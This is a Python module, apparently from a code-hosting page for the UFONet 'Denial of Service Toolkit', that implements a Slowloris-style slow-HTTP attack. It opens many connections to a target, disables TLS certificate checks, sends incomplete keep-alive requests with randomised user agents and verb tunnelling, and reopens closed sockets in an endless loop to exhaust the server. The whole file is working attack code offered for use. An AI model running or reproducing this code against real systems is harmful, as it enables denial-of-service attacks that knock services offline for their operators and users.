epsylon
/
ufonet


			
				
					
						
						
							1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586
							#!/usr/bin/env python 
# -*- coding: utf-8 -*-"
"""
UFONet - Denial of Service Toolkit - 2018 - by psy (epsylon@riseup.net)

You should have received a copy of the GNU General Public License along
with UFONet; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
"""
import socket, random, ssl, re

# UFONet Slow HTTP requests (LORIS)
def setupSocket(self, ip):
    method = random.choice(self.methods)
    port = 80
    if ip.startswith('http://'):
       ip = ip.replace('http://','')
       port = 80
    elif ip.startswith('https://'):
       ip = ip.replace('https://','')
       port = 443
    self.user_agent = random.choice(self.agents).strip()
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    if port == 443:
        sock = ssl.wrap_socket(sock, keyfile=None, certfile=None, server_side=False, cert_reqs=ssl.CERT_NONE, ssl_version=ssl.PROTOCOL_TLSv1)
    sock.connect((ip, port))
    if method == "GET":
        http_req = "GET / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
    elif method == "POST":
        http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n"
    else:
        http_req = "POST / HTTP/1.1\r\nHost: "+str(ip)+"\r\nX-HTTP-Method: PUT\r\nUser-Agent: "+str(self.user_agent)+"\r\nConnection: keep-alive\r\nCache-Control: no-cache\r\n\r\n" # "Verb Tunneling Abuse" -> [RFC2616]
    sock.sendall(http_req)
    resp = sock.recv(1280).split("\n")
    for l in resp:
        if "Location:" in l:
            try:
                ip = re.findall('https?://(?:[-\w.]|(?:%[\da-fA-F]{2}))+', l)[0] # extract new redirect url
                ip = socket.gethostbyname(ip)
            except:
                pass
    return sock, ip

def tractor(self, ip, requests): 
    n=0
    for i in range(requests): 
        n=n+1
        try:
            sock, ip = setupSocket(self, ip)
            print "[Info] LORIS: Firing 'tractor beam' ["+str(n)+"] -> Status: CONNECTED! (Keeping socket open in time...)"
        except:
            print "[Error] LORIS: Failed to engage with 'tractor beam' ["+str(n)+"]"
        self.sockets.append(sock)
    while True: # try to abuse HTTP Headers
        for sock in list(self.sockets):
            try: 
                sock, ip = setupSocket(self, ip)
            except socket.error:
                self.sockets.remove(sock)
        for i in range(requests - len(self.sockets)):
            print("[Info] LORIS: Re-opening closed 'tractor beam' -> Status: RE-LINKED!")
            sock, ip = setupSocket(self, ip)
            if sock:
                self.sockets.append(sock)

class LORIS(object):
    def __init__(self):
        self.sockets = []
        self.agents_file = 'core/txt/user-agents.txt' # set source path to retrieve user-agents
        self.agents = []
        f = open(self.agents_file)
        agents = f.readlines()
        f.close()
        for agent in agents:
            self.agents.append(agent)
        self.methods = ['GET', 'POST', 'X-METHOD'] # supported HTTP requests methods

    def attacking(self, target, requests):
        print "\n[Info] Slow HTTP requests (LORIS) is ready to fire: [" , requests, "tractor beams ]\n"
        try:
            ip = socket.gethostbyname(target)
        except:
            ip = target
        tractor(self, ip, requests) # attack with LORIS using threading